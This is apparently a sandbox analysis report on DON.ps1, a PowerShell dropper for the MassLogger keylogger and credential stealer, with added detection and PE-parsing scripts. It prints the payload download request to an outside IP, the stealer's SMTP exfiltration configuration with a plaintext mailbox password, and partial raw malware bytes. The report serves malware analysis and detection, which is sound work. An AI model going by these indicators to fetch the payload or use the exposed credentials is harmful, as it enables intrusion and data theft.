
Windows Analysis Report
DON.ps1

Overview

General Information

Sample name: DON.ps1
Analysis ID: 1638293
MD5: e2fcebe8b83f6ed9a980c50163081dea
SHA1: 340c99bce0ede926ac7dfd7a092ca080c44539e0
SHA256: c6cfa595bfd62eda920d105f23b3f3c26e05e894784b4059b38d57c7bb778597
Tags: ps1, user-TornadoAV_dev

Detection

MSIL Logger, MassLogger RAT
Score: 100
Range: 0 - 100
Confidence: 100%

Signatures

Antivirus detection for dropped file
Found malware configuration
Malicious sample detected (through community Yara rule)
Multi AV Scanner detection for dropped file
Multi AV Scanner detection for submitted file
Yara detected MSIL Logger
Yara detected MassLogger RAT
Yara detected Telegram RAT
.NET source code references suspicious native API functions
Contains functionality to capture screen (.Net source)
Contains functionality to log keystrokes (.Net Source)
Found suspicious powershell code related to unpacking or dynamic code loading
Injects a PE file into a foreign processes
Joe Sandbox ML detected suspicious sample
Powershell drops PE file
Tries to detect the country of the analysis system (by using the IP)
Tries to harvest and steal browser information (history, passwords, etc)
Tries to steal Mail credentials (via file / registry access)
Abnormal high CPU Usage
Allocates memory with a write watch (potentially for evading sandboxes)
Binary contains a suspicious time stamp
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Creates a window with clipboard capturing capabilities
Creates files inside the system directory
Detected TCP or UDP traffic on non-standard ports
Detected potential crypto function
Downloads executable code via HTTP
Dropped file seen in connection with other malware
Drops PE files
Enables debug privileges
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Found dropped PE file which has not been started or loaded
Found inlined nop instructions (likely shell or obfuscated code)
HTTP GET or POST without a user agent
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
JA3 SSL client fingerprint seen in connection with other malware
May check the online IP address of the machine
May sleep (evasive loops) to hinder dynamic analysis
Monitors certain registry keys / values for changes (often done to protect autostart functionality)
Queries disk information (often used to detect virtual machines)
Queries the volume information (name, serial number etc) of a device
Sigma detected: Change PowerShell Policies to an Insecure Level
Sigma detected: Suspicious Outbound SMTP Connections
Suricata IDS alerts with low severity for network traffic
Uses SMTP (mail sending)
Uses a known web browser user agent for HTTP communication
Uses code obfuscation techniques (call, push, ret)
Uses insecure TLS / SSL version for HTTPS connection
Yara detected Credential Stealer
Yara signature match

Classification

  • System is w10x64
  • powershell.exe (PID: 6676 cmdline: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noLogo -ExecutionPolicy unrestricted -file "C:\Users\user\Desktop\DON.ps1" MD5: C32CA4ACFCC635EC1EA6ED8A34DF5FAC)
    • conhost.exe (PID: 6784 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
    • x.exe (PID: 6428 cmdline: "C:\Users\user\AppData\Local\Temp\x.exe" MD5: E49DBDCF9C9CCA18487D278FF701AE42)
      • x.exe (PID: 4624 cmdline: "C:\Users\user\AppData\Local\Temp\x.exe" MD5: E49DBDCF9C9CCA18487D278FF701AE42)
  • notepad.exe (PID: 7096 cmdline: "C:\Windows\System32\notepad.exe" "C:\Users\user\Desktop\DON.ps1" MD5: 27F71B12CB585541885A31BE22F61C83)
  • svchost.exe (PID: 6868 cmdline: C:\Windows\System32\svchost.exe -k netsvcs -p -s BITS MD5: B7F884C1B74A263F746EE12A5F7C9F6A)
  • cleanup
Malware configuration (MassLogger, extracted from process memory):
{"EXfil Mode": "SMTP", "From": "thejaswi@tsengg.com", "Password": "@bettermoney3490", "Server": "mail.tsengg.com"}
Yara matches, network capture (dump.pcap)
  Source: dump.pcap, Rule: JoeSecurity_MSILLogger, Description: Yara detected MSIL Logger, Author: Joe Security
  Source: dump.pcap, Rule: Windows_Trojan_SnakeKeylogger_af3faa65, Description: unknown, Author: unknown, matched strings:
    • 0x11dd6:$a1: get_encryptedPassword
    • 0x12112:$a2: get_encryptedUsername
    • 0x11b1d:$a3: get_timePasswordChanged
    • 0x11c3e:$a4: get_passwordField
    • 0x11dec:$a5: set_encryptedPassword
    • 0x13966:$a7: get_logins
    • 0x13585:$a8: GetOutlookPasswords
    • 0x13363:$a9: StartKeylogger
    • 0x138b6:$a10: KeyLoggerEventArgs
    • 0x133c0:$a11: KeyLoggerEventArgsEventHandler

Yara matches, process memory dumps
  Source: 00000004.00000002.1134625680.0000000004309000.00000004.00000800.00020000.00000000.sdmp (process index 4, i.e. x.exe)
    Rule: JoeSecurity_MassLogger, Description: Yara detected MassLogger RAT, Author: Joe Security
    Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Author: Joe Security
    Rule: JoeSecurity_MSILLogger, Description: Yara detected MSIL Logger, Author: Joe Security
    Rule: JoeSecurity_TelegramRAT, Description: Yara detected Telegram RAT, Author: Joe Security
    Rule: Windows_Trojan_SnakeKeylogger_af3faa65, Description: unknown, Author: unknown, matched strings:
      • 0x769:$a1: get_encryptedPassword
      • 0xaa5:$a2: get_encryptedUsername
      • 0x617:$a4: get_passwordField
      • 0x77f:$a5: set_encryptedPassword
      • 0x214f:$a7: get_logins
      • 0x1e00:$a8: GetOutlookPasswords
      • 0x1bde:$a9: StartKeylogger
      • 0x209f:$a10: KeyLoggerEventArgs
      • 0x1c3b:$a11: KeyLoggerEventArgsEventHandler
  (24 further memory-dump matches are not shown in this excerpt)

Yara matches, unpacked PE files
  Source: 4.2.x.exe.2b89bb4.2.raw.unpack, Rule: JoeSecurity_MSILLogger, Description: Yara detected MSIL Logger, Author: Joe Security
  Source: 4.2.x.exe.2b89bb4.2.unpack, Rule: JoeSecurity_MSILLogger, Description: Yara detected MSIL Logger, Author: Joe Security
  Source: 4.2.x.exe.2b85378.0.unpack, Rule: JoeSecurity_MSILLogger, Description: Yara detected MSIL Logger, Author: Joe Security
  Source: 4.2.x.exe.2b85378.0.raw.unpack, Rule: JoeSecurity_MSILLogger, Description: Yara detected MSIL Logger, Author: Joe Security
  Source: 5.2.x.exe.400000.0.unpack, Rule: JoeSecurity_MassLogger, Description: Yara detected MassLogger RAT, Author: Joe Security
  (17 further unpacked-file matches are not shown in this excerpt)

System Summary

Sigma rule matches

Process started (rule author: frack113; this is the "Change PowerShell Policies to an Insecure Level" hit listed above)
  Command / CommandLine / ProcessCommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noLogo -ExecutionPolicy unrestricted -file "C:\Users\user\Desktop\DON.ps1"
  Image / NewProcessName / OriginalFileName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
  ProcessId: 6676, ProcessName: powershell.exe, ParentProcessId: 5708, ParentImage and ParentCommandLine: not recorded
  CommandLine|base64offset|contains: z
  Note: the command line names System32, but the image that actually ran is the SysWOW64 (32-bit) PowerShell. That is WOW64 file-system redirection at work, so the unrecorded parent PID 5708 was a 32-bit process; when hunting, match on the Image field and not only on the command-line path.

Network Connection (rule author: frack113; this is the "Suspicious Outbound SMTP Connections" hit listed above)
  EventID: 3, Protocol: tcp, Initiated: true
  Image: C:\Users\user\AppData\Local\Temp\x.exe, ProcessId: 4624
  SourceIp: 192.168.2.11, SourcePort: 49710, DestinationIp: 103.21.58.29, DestinationPort: 587 (DestinationIsIpv6: false, SourceIsIpv6: false)

Process started (rule author: Roberto Rodriguez @Cyb3rWard0g, improvements: oscd.community): the same powershell.exe event as above, with identical fields (ProcessId 6676, ParentProcessId 5708)

Process started (rule author: vburov)
  Command / CommandLine / ProcessCommandLine: C:\Windows\System32\svchost.exe -k netsvcs -p -s BITS
  Image / NewProcessName / OriginalFileName: C:\Windows\System32\svchost.exe
  ProcessId: 6868, ProcessName: svchost.exe, ParentProcessId: 624, ParentImage and ParentCommandLine: not recorded
  CommandLine|base64offset|contains: (empty)
Suricata IDS alerts (all rows: SID 2803274, Severity 2, Classtype "Potentially Bad Traffic", TCP 192.168.2.11 -> 132.226.247.73:80)

  Timestamp                          Source port
  2025-03-14T11:06:34.229323+0100    49708
  2025-03-14T11:06:40.447341+0100    49708
  2025-03-14T11:06:49.556721+0100    49719
  2025-03-14T11:07:47.572412+0100    49734
  2025-03-14T11:08:14.025705+0100    49742
  2025-03-14T11:08:14.994475+0100    49744
  2025-03-14T11:08:18.603769+0100    49746
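The Sigma and Suricata rows above are single matches; what a detection engineer wants is the logic behind them, run over the kind of telemetry a host agent emits. The block below is an added example, not Joe Sandbox or Sigma code: it implements four checks that correspond to signatures in this report (insecure PowerShell execution policy, a script host launching an EXE from %TEMP%, outbound SMTP from a non-mail process, and public-IP lookups or a User-Agent-less executable download) and runs them over constructed Sysmon-style events whose values are taken from the process tree, Sigma and network sections. The MAIL_CLIENTS allowlist, the IP_LOOKUP_HOSTS set and the two "benign control" events are assumptions added to show what the rules do not flag.

```python
"""Detection logic for the behaviours this report flags, run over constructed
Sysmon-style events modelled on the report's process tree, Sigma hits and
network section. Added example, not Joe Sandbox or Sigma code; MAIL_CLIENTS
and IP_LOOKUP_HOSTS are assumed tuning lists, and the "benign control" events
are invented to show what the rules do not flag."""
import re
from typing import Dict, List, Tuple

Event = Dict[str, object]
Finding = Tuple[str, str]

PROCESS_EVENTS: List[Event] = [
    {"pid": 6676, "ppid": 5708,
     "image": r"C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe",
     "cmd": r'"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noLogo '
            r'-ExecutionPolicy unrestricted -file "C:\Users\user\Desktop\DON.ps1"'},
    {"pid": 6428, "ppid": 6676, "image": r"C:\Users\user\AppData\Local\Temp\x.exe",
     "cmd": r'"C:\Users\user\AppData\Local\Temp\x.exe"'},
    {"pid": 6868, "ppid": 624, "image": r"C:\Windows\System32\svchost.exe",
     "cmd": r"C:\Windows\System32\svchost.exe -k netsvcs -p -s BITS"},
]
NETWORK_EVENTS: List[Event] = [  # Sysmon EventID 3 shape
    {"pid": 4624, "image": r"C:\Users\user\AppData\Local\Temp\x.exe",
     "dst": "103.21.58.29", "dport": 587, "proto": "tcp"},
    {"pid": 9001, "image": r"C:\Program Files\Microsoft Office\root\Office16\OUTLOOK.EXE",
     "dst": "203.0.113.25", "dport": 587, "proto": "tcp"},  # benign control (constructed)
]
HTTP_EVENTS: List[Event] = [
    {"host": "checkip.dyndns.org", "path": "/",
     "ua": "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)"},
    {"host": "reallyfreegeoip.org", "path": "/xml/8.46.123.189", "ua": None},
    {"host": "176.65.144.3", "path": "/dev/DON.exe", "ua": None,
     "content_type": "application/x-msdownload"},
    {"host": "www.example.com", "path": "/", "ua": "Mozilla/5.0",
     "content_type": "text/html"},  # benign control (constructed)
]

SCRIPT_HOSTS = {"powershell.exe", "pwsh.exe", "wscript.exe", "cscript.exe", "mshta.exe"}
MAIL_CLIENTS = {"outlook.exe", "thunderbird.exe"}                # assumed allowlist
SMTP_PORTS = {25, 465, 587}
IP_LOOKUP_HOSTS = {"checkip.dyndns.org", "reallyfreegeoip.org", "api.ipify.org"}
# -ExecutionPolicy and its unambiguous prefixes (-ep, -ex, -exec) followed by a weak level
POLICY_RE = re.compile(r"-(?:ep|ex(?:ec(?:utionpolicy)?)?)\s+(?:unrestricted|bypass)\b", re.I)


def basename(path: str) -> str:
    return path.rsplit("\\", 1)[-1].lower()


def detect_process(events: List[Event]) -> List[Finding]:
    """Weak execution policy on a PowerShell command line; a script host running an EXE out of %TEMP%."""
    by_pid = {e["pid"]: e for e in events}
    out: List[Finding] = []
    for e in events:
        img = basename(str(e["image"]))
        m = POLICY_RE.search(str(e["cmd"]))
        if img in {"powershell.exe", "pwsh.exe"} and m:
            out.append(("powershell_insecure_policy", f"pid {e['pid']}: {m.group(0)}"))
        parent = by_pid.get(e["ppid"])
        if parent and basename(str(parent["image"])) in SCRIPT_HOSTS \
                and "\\appdata\\local\\temp\\" in str(e["image"]).lower():
            out.append(("script_host_spawned_temp_exe",
                        f"pid {e['pid']} {img} <- {basename(str(parent['image']))} pid {parent['pid']}"))
    return out


def detect_network(events: List[Event]) -> List[Finding]:
    """Outbound SMTP from anything that is not a mail client (MassLogger's 'EXfil Mode': 'SMTP')."""
    return [("suspicious_outbound_smtp", f"pid {e['pid']} {basename(str(e['image']))} -> {e['dst']}:{e['dport']}")
            for e in events
            if e["proto"] == "tcp" and e["dport"] in SMTP_PORTS and basename(str(e["image"])) not in MAIL_CLIENTS]


def detect_http(events: List[Event]) -> List[Finding]:
    """Public-IP / geolocation lookups, and an executable fetched with no User-Agent header at all."""
    out: List[Finding] = []
    for e in events:
        if str(e["host"]).lower() in IP_LOOKUP_HOSTS:
            out.append(("external_ip_lookup", f"{e['host']}{e['path']}"))
        if e.get("ua") is None and e.get("content_type") == "application/x-msdownload":
            out.append(("executable_download_no_user_agent", f"{e['host']}{e['path']}"))
    return out


def run_all() -> List[Finding]:
    return detect_process(PROCESS_EVENTS) + detect_network(NETWORK_EVENTS) + detect_http(HTTP_EVENTS)


if __name__ == "__main__":
    for rule, detail in run_all():
        print(f"{rule:36} {detail}")
```

On the report's events this yields six findings (one per rule, two for the IP-lookup rule) and nothing for the two control events. The SMTP check is intentionally image-based rather than port-based alone: port 587 from Outlook is normal, port 587 from an unsigned binary in %TEMP% is the exfiltration channel the extracted configuration describes.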


AV Detection

Source: C:\Users\user\AppData\Local\Temp\RUNPEE.dll, Avira: detection malicious, Label: TR/Injector.vqojt
Source: C:\Users\user\AppData\Local\Temp\x.exe, Avira: detection malicious, Label: TR/Injector.vqojt
Source: 00000004.00000002.1134625680.0000000004309000.00000004.00000800.00020000.00000000.sdmp, Malware Configuration Extractor: MassLogger {"EXfil Mode": "SMTP", "From": "thejaswi@tsengg.com", "Password": "@bettermoney3490", "Server": "mail.tsengg.com"}
Source: C:\Users\user\AppData\Local\Temp\RUNPEE.dll, ReversingLabs: Detection: 79%
Source: C:\Users\user\AppData\Local\Temp\x.exe, ReversingLabs: Detection: 70%
Source: DON.ps1, Virustotal: Detection: 20%
Source: DON.ps1, ReversingLabs: Detection: 28%
Source: Submitted Sample, Integrated Neural Analysis Model: Matched 99.5% probability

Location Tracking

Source: unknown, DNS query: name: reallyfreegeoip.org
Source: unknown, HTTPS traffic detected: 104.21.32.1:443 -> 192.168.2.11:49709, version: TLS 1.0
Source: Binary string: CZG3HF22.pdb, source: x.exe, 00000004.00000000.1110223011.00000000006F2000.00000002.00000001.01000000.0000000A.sdmp, x.exe.0.dr
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, File opened: C:\Users\user\AppData\Roaming
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, File opened: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\desktop.ini
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, File opened: C:\Users\user\AppData
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, File opened: C:\Users\user
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, File opened: C:\Users\user\AppData\Roaming\Microsoft
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, File opened: C:\Users\user\AppData\Roaming\Microsoft\Windows
Source: C:\Users\user\AppData\Local\Temp\x.exe, Code function: 4x nop then jmp 00D547D8h (4_2_00D54688)
Source: C:\Users\user\AppData\Local\Temp\x.exe, Code function: 4x nop then jmp 00D5482Eh (4_2_00D54688)
Source: C:\Users\user\AppData\Local\Temp\x.exe, Code function: 4x nop then jmp 02AA9731h (5_2_02AA9480)
Source: C:\Users\user\AppData\Local\Temp\x.exe, Code function: 4x nop then jmp 02AA9E5Ah (5_2_02AA9A40)
Source: C:\Users\user\AppData\Local\Temp\x.exe, Code function: 4x nop then jmp 02AA9E5Ah (5_2_02AA9A30)
Source: C:\Users\user\AppData\Local\Temp\x.exe, Code function: 4x nop then jmp 02AA9E5Ah (5_2_02AA9D87)
Source: C:\Users\user\AppData\Local\Temp\x.exe, Code function: 4x nop then mov ecx, 000003E8h (5_2_06552090)
Source: C:\Users\user\AppData\Local\Temp\x.exe, Code function: 4x nop then mov ecx, 000003E8h (5_2_06552082)
Source: C:\Users\user\AppData\Local\Temp\x.exe, Code function: 4x nop then push 00000000h (5_2_0655E1E8)
Source: C:\Users\user\AppData\Local\Temp\x.exe, Code function: 4x nop then lea esp, dword ptr [ebp-08h] (5_2_0655E1E8)
Source: C:\Users\user\AppData\Local\Temp\x.exe, Code function: 4x nop then push 00000000h (5_2_0655ED33)
Source: C:\Users\user\AppData\Local\Temp\x.exe, Code function: 4x nop then push 00000000h (5_2_0706A3B8)
Source: C:\Users\user\AppData\Local\Temp\x.exe, Code function: 4x nop then jmp 0706C266h (5_2_0706BEF4)
Source: C:\Users\user\AppData\Local\Temp\x.exe, Code function: 4x nop then jmp 0706C266h (5_2_0706C1B5)
Source: C:\Users\user\AppData\Local\Temp\x.exe, Code function: 4x nop then lea esp, dword ptr [ebp-08h] (5_2_0706B1D3)
Source: C:\Users\user\AppData\Local\Temp\x.exe, Code function: 4x nop then push 00000000h (5_2_0706AF10)
Source: C:\Users\user\AppData\Local\Temp\x.exe, Code function: 4x nop then lea esp, dword ptr [ebp-04h] (5_2_0706BC69)
Source: global traffic, TCP traffic: 192.168.2.11:49710 -> 103.21.58.29:587
Source: global traffic, HTTP traffic detected (the application/x-msdownload response; its 98304-byte body, 0x18000 as in the ETag, is the executable fetched by the GET /dev/DON.exe request below):
  HTTP/1.1 200 OK
  Date: Fri, 14 Mar 2025 10:06:32 GMT
  Server: Apache/2.4.58 (Win64) OpenSSL/3.1.3 PHP/8.0.30
  Last-Modified: Mon, 10 Feb 2025 00:54:45 GMT
  ETag: "18000-62dbf2787c818"
  Accept-Ranges: bytes
  Content-Length: 98304
  Keep-Alive: timeout=5, max=100
  Connection: Keep-Alive
  Content-Type: application/x-msdownload
  Data Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 80 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 50 45 00 00 4c 01 03 00 d1 6e 48 b1 00 00 00 00 00 00 00 00 e0 00 02 01 0b 01 50 00 00 76 01 00 00 08 00 00 00 00 00 00 de 95 01 00 00 20 00 00 00 a0 01 00 00 00 40 00 00 20 00 00 00 02 00 00 04 00 00 00 00 00 00 00 06 00 00 00 00 00 00 00 00 e0 01 00 00 02 00 00 00 00 00 00 02 00 60 85 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 00 8c 95 01 00 4f 00 00 00 00 a0 01 00 c6 05 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 c0 01 00 0c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 08 00 00 00 00 00 00 00 00 00 00 00 08 20 00 00 48 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 e4 75 01 00 00 20 00 00 00 76 01 00 00 02 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 72 73 72 63 00 00 00 c6 05 00 00 00 a0 01 00 00 06 00 00 00 78 01 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 65 6c 6f 63 00 00 0c 00 00 00 00 c0 01 00 00 02 00 00 00 7e 01 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 42 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 c0 95 01 00 00 00 00 00 48 00 00 00 02 00 05 00 d8 dd 00 00 b4 b7 00 00 03 00 00 00 5a 00 00 06 20 dd 00 00 b8 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 83 7d fc 0f 8e b3 e8 69 73 af ff 00 00 00 00 00 00 01 02 03 04 06 08 08 00 00 00 00 00 00 00 00 7e 00 00 00 46 00 00 00 40 00 00 00 37 00 00 00 25 00 00 00 6d 00 00 00 24 00 00 00 7e 00 00 00 7e 00 00 00 64 00 00 00 72 00 00 00 61 00 00 00 47 00 00 00 6f 00 00 00 6e 00 00 00 7e 00 00 00 1e 02 28 1f 00 00 0a 2a 26 00 02 28 20 00 00 0a 00 2a ce 73 21 00 00 0a 80 01 00 00 04 73 22 00 00 0a 80 02 00 00 04 73 23 00 00 0a 80 03 00 00 04 73 24 00 00 0a 80 04 00 00 04 73 25 00 00 0a 80 05 00 00 04 2a 5a 00 03 fe 16 06 00 00 1b 6f 38 00 00 0a 00 03 fe 15 06 00 00 1b 2a 26 00 02 28 39 00 00 0a 00 2a 26 00 03 fe 15 06 00 00 1b 2a 22 00 02 80 09 00 00 04 2a 56 73 1d 00 00 06 28 42 00 00 0a 74 09 00 00 02 80 0a 00 00 04 2a 1e 02 28 43 00 00 0a 2a 22 7e 13 00 00 04 2b 00 2a 22 7e 14 00 00 04 2b 00 2a 22 7e 15 00 00 04 2b 00 2a 22 7e 16 00 00 04 2b 00 2a 22 7e 17 00 00 04 2b 00 2a 62 00 72
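The raw bytes of that response are enough to confirm two of the report's signatures without the sandbox: "Downloads executable code via HTTP" and "Binary contains a suspicious time stamp". The block below is an added example, not Joe Sandbox code: HEADER is the first 0x220 bytes of the Data Raw dump above transcribed into a byte string, and CAPTURED_AT and CONTENT_LENGTH are taken from the response's Date and Content-Length headers. It walks the DOS header, PE signature, file header, PE32 optional header and section table, follows the CLR data directory into the IMAGE_COR20_HEADER, decodes the link timestamp, and cross-checks the section layout against the advertised body size.

```python
"""Parse the PE image the sandbox captured in the response to GET /dev/DON.exe.

Added example, not Joe Sandbox code. HEADER is the first 0x220 bytes of the
response's 'Data Raw' dump transcribed from this report; CAPTURED_AT and
CONTENT_LENGTH come from its Date and Content-Length headers."""
import struct
from datetime import datetime, timedelta, timezone

HEADER = bytes.fromhex(
    "4d5a90000300000004000000ffff0000" "b8000000000000004000000000000000"  # DOS header, e_lfanew = 0x80
    "00000000000000000000000000000000" "00000000000000000000000080000000"
    "0e1fba0e00b409cd21b8014ccd215468" "69732070726f6772616d2063616e6e6f"  # DOS stub
    "742062652072756e20696e20444f5320" "6d6f64652e0d0d0a2400000000000000"
    "504500004c010300d16e48b100000000" "00000000e00002010b01500000760100"  # PE sig, file header, optional header
    "0008000000000000de95010000200000" "00a00100000040000020000000020000"
    "04000000000000000600000000000000" "00e00100000200000000000002006085"
    "00001000001000000000100000100000" "00000000100000000000000000000000"
    "8c9501004f00000000a00100c6050000" "00000000000000000000000000000000"  # data directories
    "00c001000c0000000000000000000000" "00000000000000000000000000000000"
    "00000000000000000000000000000000" "00000000000000000020000008000000"
    "00000000000000000820000048000000" "00000000000000002e74657874000000"  # CLR dir, then .text section header
    "e4750100002000000076010000020000" "00000000000000000000000020000060"
    "2e72737263000000c605000000a00100" "00060000007801000000000000000000"  # .rsrc
    "00000000400000402e72656c6f630000" "0c00000000c0010000020000007e0100"  # .reloc
    "00000000000000000000000040000042" "00000000000000000000000000000000"
    "c0950100000000004800000002000500" "d8dd0000b4b70000030000005a000006"  # start of .text: IAT, IMAGE_COR20_HEADER
)
CAPTURED_AT = datetime(2025, 3, 14, 10, 6, 32, tzinfo=timezone.utc)   # HTTP Date header
CONTENT_LENGTH = 98304


def rva_to_offset(sections, rva):
    """Map a relative virtual address onto a file offset via the section table."""
    for s in sections:
        if s["va"] <= rva < s["va"] + max(s["vsize"], s["raw_size"]):
            return rva - s["va"] + s["raw_ptr"]
    raise ValueError(f"RVA {rva:#x} not in any section")


def parse_pe_header(data: bytes) -> dict:
    """DOS header -> PE signature -> file header -> PE32 optional header -> sections -> CLR header."""
    if data[:2] != b"MZ":
        raise ValueError("not an MZ image")
    e_lfanew = struct.unpack_from("<I", data, 0x3C)[0]
    if data[e_lfanew:e_lfanew + 4] != b"PE\0\0":
        raise ValueError("PE signature missing")
    machine, nsect, tstamp, _, _, opt_size, chars = struct.unpack_from("<HHIIIHH", data, e_lfanew + 4)
    opt = e_lfanew + 24                                   # optional header follows the 20-byte file header
    if struct.unpack_from("<H", data, opt)[0] != 0x10B:
        raise ValueError("only PE32 (32-bit) images handled here")
    n_dirs = struct.unpack_from("<I", data, opt + 92)[0]
    dirs = [struct.unpack_from("<II", data, opt + 96 + 8 * i) for i in range(n_dirs)]
    sections = []
    for i in range(nsect):                                # 40-byte IMAGE_SECTION_HEADER entries
        name, vsize, va, rsize, rptr, _, _, _, _, sc = struct.unpack_from(
            "<8sIIIIIIHHI", data, opt + opt_size + 40 * i)
        sections.append({"name": name.rstrip(b"\0").decode(), "vsize": vsize, "va": va,
                         "raw_size": rsize, "raw_ptr": rptr, "chars": sc})
    pe = {"machine": machine, "num_sections": nsect, "timestamp": tstamp, "characteristics": chars,
          "entry_point": struct.unpack_from("<I", data, opt + 16)[0],
          "image_base": struct.unpack_from("<I", data, opt + 28)[0],
          "dll_characteristics": struct.unpack_from("<H", data, opt + 70)[0],
          "import_dir": dirs[1], "clr_dir": dirs[14] if n_dirs > 14 else (0, 0), "sections": sections}
    if pe["clr_dir"][0]:                                  # IMAGE_COR20_HEADER: cb, runtime major/minor, metadata, flags
        cb, major, minor, md_rva, md_size, flags = struct.unpack_from(
            "<IHHIII", data, rva_to_offset(sections, pe["clr_dir"][0]))
        pe["clr"] = {"version": f"{major}.{minor}", "metadata_rva": md_rva, "flags": flags}
    return pe


def assess(pe: dict, captured_at: datetime, content_length: int) -> dict:
    """Turn header facts into the checks an analyst wants: .NET? link time plausible? size consistent?"""
    built = datetime(1970, 1, 1, tzinfo=timezone.utc) + timedelta(seconds=pe["timestamp"])
    expected_size = max(s["raw_ptr"] + s["raw_size"] for s in pe["sections"])
    return {
        "is_dotnet": pe["clr_dir"][0] != 0,
        "il_only": bool(pe.get("clr", {}).get("flags", 0) & 0x1),     # COMIMAGE_FLAGS_ILONLY
        "built": built.isoformat(),
        # a link time after the capture cannot be real; deterministic .NET builds store a content hash here
        "timestamp_in_future": built > captured_at,
        "expected_size": expected_size,
        "size_matches_content_length": expected_size == content_length,
        "sections": [s["name"] for s in pe["sections"]],
    }


if __name__ == "__main__":
    parsed = parse_pe_header(HEADER)
    for key, value in assess(parsed, CAPTURED_AT, CONTENT_LENGTH).items():
        print(f"{key}: {value}")
```

The parse shows an i386 PE32 with an IL-only CLR 2.5 header (so a .NET assembly, consistent with the MSIL Logger classification and the .NET source-code signatures), a TimeDateStamp that decodes to a date in 2064, and three sections whose raw layout ends exactly at 98304 bytes, so the body was a complete executable rather than a truncated download.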
Source: global traffic, HTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1 | Host: reallyfreegeoip.org | Connection: Keep-Alive (no User-Agent header; the path carries the public IP the sample learned, looked up for its country)
Source: global traffic, HTTP traffic detected: GET /dev/DON.exe HTTP/1.1 | Host: 176.65.144.3 | Connection: Keep-Alive (no User-Agent header)
Source: Joe Sandbox View, IP Address: 176.65.144.3
Source: Joe Sandbox View, IP Address: 104.21.32.1
Source: Joe Sandbox View, IP Address: 193.122.6.168
Source: Joe Sandbox View, ASN Name: PUBLIC-DOMAIN-REGISTRYUS
Source: Joe Sandbox View, JA3 fingerprint: 54328bd36c14bd82ddaa0c04b25ed9ad
Source: unknown, DNS query: name: checkip.dyndns.org (three queries)
Source: unknown, DNS query: name: reallyfreegeoip.org
Source: Network traffic, Suricata IDS: 2803274 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UH : 192.168.2.11 -> 132.226.247.73:80, from source ports 49708, 49719, 49734, 49742, 49744 and 49746
Source: global traffic, TCP traffic: 192.168.2.11:49710 -> 103.21.58.29:587 (the SMTP exfiltration connection, listed again under the mail-sending signature)
                      Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
                      Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
                      Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
                      Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
                      Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
                      Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
                      Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
